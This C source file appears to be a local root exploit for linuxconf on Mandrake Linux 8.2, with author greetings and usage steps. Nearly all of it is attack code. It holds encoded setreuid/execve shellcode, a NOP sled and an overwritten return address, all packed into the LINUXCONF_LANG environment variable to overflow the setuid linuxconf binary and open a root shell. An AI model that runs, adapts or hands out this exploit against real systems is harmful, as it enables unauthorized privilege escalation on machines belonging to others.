/*
linuxconf mandrake 8.2

by pokleyzz (pokleyzz@scan-associates.net)
** for my comfimation **

greet : *(sk + wanvadder + Skywizard + The_Gigco + scan clan (if exist) + #mylinux + #mybsd)

usage :
  $ gcc elinuxconf.c -o elinuxconf
  $ mkdir linuxconf.eng
  $ touch linuxconf.eng/linuxconf.eng
  $ ./elinuxconf
  # reboot 
  
http://www.scan-associates.net  
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <malloc.h>

#define LINUXCONF "/bin/linuxconf"
#define BUFFSIZE 2050
#define OFFSET 0x1111
// pointer to some string
#define DUMMY 0x0811708d

char shellcode[] =              /*execve with setreuid(0,0) and no '/' hellkit v1.1 */
  "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
  "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
  "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"
  "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"
  "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
  "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"
  "\xc2\x91";
     
long get_sp ()
{
  __asm__("movl %esp,%eax");
}

int main (int argc, char **argv)
{
  char *buff;
  int i , ret;

  buff = (char *)malloc(BUFFSIZE);
  ret = get_sp() - OFFSET;

  for (i = 0;i < 2048 ; i++)
    buff[i] = 0x90;
 
  memcpy((char*)(buff + 1600),shellcode,strlen(shellcode));
  
  for (i = 0; i < 108 ; i+=4)
    *(char **)&buff[1940 +i] = DUMMY;
  
  *(char **)&buff[1976] = ret;
  
  buff[2049] = 0x00;
  setenv("LINUXCONF_LANG",buff,1);
  execl(LINUXCONF, "linuxconf", 0);

  return 0;
}